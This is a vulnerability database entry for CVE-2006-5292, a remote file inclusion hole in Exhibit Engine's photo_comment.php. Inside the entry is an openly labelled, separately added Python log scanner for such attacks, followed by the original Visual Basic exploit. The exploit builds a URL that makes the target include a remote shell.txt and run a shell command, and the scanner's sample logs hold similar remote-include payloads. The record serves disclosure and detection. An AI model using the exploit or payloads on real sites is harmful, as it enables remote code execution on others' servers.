Exhibit Engine 'Photo_Comment.PHP' Remote File Inclusion Vulnerability

Vulnerability ID: 1111230
Vulnerability type: Input validation
Published: 2006-10-10
Updated: 2006-10-19
CVE: CVE-2006-5292
CNNVD-ID: CNNVD-200610-221
Platform: PHP
CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/2509
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-221
|Vulnerability Details
A PHP remote file inclusion vulnerability exists in photo_comment.php of ExhibitEngine. A remote attacker can execute arbitrary PHP code by supplying a URL in the toroot parameter.
|Vulnerability EXP
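As an added defender-side example (not part of the original record or of the exploit below): a Python scanner that flags requests to photo_comment.php whose toroot value, after percent-decoding, starts with a URL scheme or PHP stream wrapper. It assumes Apache combined-log format; the log lines and the 203.0.113.x / 198.51.100.5 addresses are constructed sample data.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined-log style (not taken from the page);
# 203.0.113.x and 198.51.100.5 are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2006:12:00:01 +0000] "GET /gallery/photo_comment.php?toroot=../ HTTP/1.1" 200 512
203.0.113.8 - - [10/Oct/2006:12:00:05 +0000] "GET /gallery/photo_comment.php?toroot=http://198.51.100.5/shell.txt? HTTP/1.1" 200 2048
203.0.113.9 - - [10/Oct/2006:12:00:09 +0000] "GET /gallery/photo_comment.php?toroot=%2568%2574%2574%2570%253a%252f%252f198.51.100.5%252fshell.txt HTTP/1.1" 200 2048
203.0.113.10 - - [10/Oct/2006:12:00:12 +0000] "GET /gallery/index.php HTTP/1.1" 200 128
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*? "(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A leading URL scheme or PHP stream wrapper (http:, ftp:, php:, data:, ...) is what
# turns include($toroot . '...') into loading attacker-chosen code; plain relative
# paths such as "../" are a different (local inclusion) problem and are not flagged here.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*:', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Remove up to max_rounds layers of percent-encoding (double encoding is a common evasion)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text, script="photo_comment.php", param="toroot"):
    """Return (client_ip, decoded_value) for each request to `script` whose `param`
    value starts with a URL scheme or stream wrapper."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/" + script):
            continue
        # parse_qs strips one encoding layer; fully_decode takes care of the rest
        for raw in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            value = fully_decode(raw)
            if SCHEME_RE.match(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip}: remote include attempt, toroot={value}")
```

Of the four constructed lines, only the two carrying a decoded http:// value are reported; the traversal-only request and the unrelated index.php request are left alone.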
'
' EXPLOIT (c)oded by Kacper in Visual Basic ;-)
'
':::::::::  :::::::::: :::     ::: ::::::::::: :::
':+:    :+: :+:        :+:     :+:     :+:     :+:
'+:+    +:+ +:+        +:+     +:+     +:+     +:+
'+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+
'+#+    +#+ +#+         +#+   +#+      +#+     +#+
'#+#    #+# #+#          #+#+#+#       #+#     #+#
'#########  ##########     ###     ########### ##########
'::::::::::: ::::::::::     :::     ::::    ::::
'    :+:     :+:          :+: :+:   +:+:+: :+:+:+
'    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
'    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
'    +#+     +#+        +#+     +#+ +#+       +#+
'    #+#     #+#        #+#     #+# #+#       #+#
'    ###     ########## ###     ### ###       ###
'
'
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- Exhibit Engine <= 1.5 RC 4 (photo_comment.php) Remote File Include Exploit
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- [Script name: Exhibit Engine 1.5 RC 4
'- [Script site: http://www.edrotberg.org/gallery/
'- dork: "generated by Exhibit Engine 1.5 RC 4"
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-          Find by: Kacper (a.k.a Rahim)
'+
'-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
'+
'-          Contact: kacper1964@yahoo.pl
'-                        or
'-           http://www.rahim.webd.pl/
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- Special Greetz: DragonHeart ;-)
'- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
'-      SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios, SpiderZ
'-
'- Greetz for all users DEVIL TEAM IRC Channel !!
'!@ Friendship cannot be traded for petty gains @!
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-            Dedicated to the person
'-         without whom I could not live...
'-           K.C:* J.M (a.k.a Magaja)
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Private Sub Form_Load()

'**********************SETTINGS**************************
' strona = path to script
' evil_script = path to shell
' cmd = shell command
'********************************************************

strona = "http://www.strona.pl/"
evil_script = "http://www.strona.pl/shell.txt?"
cmd = "ls -la"

'********************************************************
Call MsgBox("DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam .... or http://www.rahim.webd.pl/", vbCritical, "See You back again :D !!")
vul = "photo_comment.php?toroot="
exploit = strona & vul & evil_script & cmd
PageLocation$ = exploit
ShellX = Shell("explorer.exe " + PageLocation$)
Unload Me
End Sub

'************************eof*****************************
' Greetz to people of good will :D
'
'DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam

' milw0rm.com [2006-10-10]
|References

Source: XF
Name: exhibit-engine-photo-file-include(29424)
Link: http://xforce.iss.net/xforce/xfdb/29424
Source: BID
Name: 20447
Link: http://www.securityfocus.com/bid/20447
Source: MILW0RM
Name: 2509
Link: http://www.milw0rm.com/exploits/2509
Source: MILW0RM
Name: 2509
Link: http://milw0rm.com/exploits/2509